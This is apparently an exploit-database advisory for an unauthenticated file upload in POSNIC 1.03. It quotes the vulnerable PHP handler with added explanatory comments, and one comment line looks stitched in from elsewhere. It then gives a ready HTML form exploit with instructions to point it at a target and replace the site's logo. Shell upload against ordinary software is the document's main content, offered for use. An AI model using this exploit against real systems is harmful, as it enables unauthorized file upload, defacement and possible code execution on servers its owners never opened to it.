POSNIC 1.03 Shell Upload Exploit



EKU-ID: 6283 CVE: OSVDB-ID:
Author: Rony Das Published: 2017-02-09 Verified: Verified


<!--
# Exploit Title: POSNIC Unauthenticated File Upload
# Date: 04-02-2017
# Exploit Author: Rony Das
# Vendor Homepage: http://www.posnic.com
# Software Link: https://github.com/Posnic/POSNIC-1.03
# Version: 1.03
# Tested on: Ubuntu 14.04
-->
  
<!-- 
VULNERABLE CODE: /update_details.php
  
<if (isset($_POST['submit']) and $_POST['submit'] === 'Submit') {
  
    // The only gate on this upload handler is the presence of the `submit`
    // field; no authentication or session check is visible in this excerpt
    // (the advisory title describes the endpoint as unauthenticated).
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    // Extension = text after the last dot of the client-supplied filename.
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    // $_FILES[...]["type"] is the Content-Type the client declared in the
    // multipart body, not something derived from the file's bytes, so this
    // condition says nothing about the actual content. Note also that the
    // MIME list (gif/png) and the extension allow-list (gif/jpeg/jpg/png)
    // disagree, and in_array() is called without strict comparison.
    if ((($_FILES["file"]["type"] == "image/gif")
            || ($_FILES["file"]["type"] == "image/png"))
        && ($_FILES["file"]["size"] < 30000)
        && in_array($extension, $allowedExts)
    ) {
        if ($_FILES["file"]["error"] > 0) {
            echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
        } else {
            // The raw client filename and MIME type are carried forward
            // unchanged (no basename(), no server-side renaming) into the
            // filesystem path, the session and the SQL statement below.
            $upload = $_FILES["file"]["name"];
            $type = $_FILES["file"]["type"];
  
  
            // Inconsistent paths: the existence check looks under upload/, but
            // unlink() receives the bare name, i.e. a path relative to the
            // script's working directory. Unless that directory is upload/,
            // the old logo is not removed here; move_uploaded_file() below
            // overwrites an existing destination anyway.
            if (file_exists("upload/" . $_FILES["file"]["name"])) {
  
                unlink($upload);
            }
  
  
            $name = $_FILES["file"]["name"];
            // Destination is "upload/" . <client-supplied name>, unsanitized;
            // a server-generated name with a fixed, content-verified extension
            // would be the usual mitigation.
            move_uploaded_file($_FILES["file"]["tmp_name"],
                "upload/" . $name);
            //echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
            // No-op expression statement: evaluates $upload and discards it.
            $upload;
            $_SESSION['logo'] = $upload;
  
            # Note that filters and validators are separate rule sets and method calls. There is a good reason for this.
  
            // SQL assembled by string concatenation from the client-controlled
            // filename and MIME type with no parameter binding, and with no
            // WHERE clause, so every row of store_details is updated. Use a
            // prepared statement with bound values (whatever $db's driver
            // provides) and scope the UPDATE to the intended row.
            $db->query("UPDATE store_details  SET log ='" . $upload . "',type='" . $type . "'");
  
-->
  
  
  
<!-- Exploit -->
<!-- 
Set your target in the action="http://yourtarget.com/posnicdirectory/update_details.php" attribute.
Then choose an image file and rename it to "posnic.png"; this replaces the LOGO.
It is a replace rather than an overwrite, because the script deletes the file if it already exists and then stores the
newly uploaded one.
  
//if (file_exists("upload/" . $_FILES["file"]["name"])) {
  
//                unlink($upload);
//            }
-->
  
<center>
<form action="http://localhost/posnic/update_details.php" method="POST" enctype="multipart/form-data">
            <p>Upload Logo</p>
            <input type="file" name="file" id="file"><br><br><br>
            <input type="submit" name="submit" value="Submit">
</form>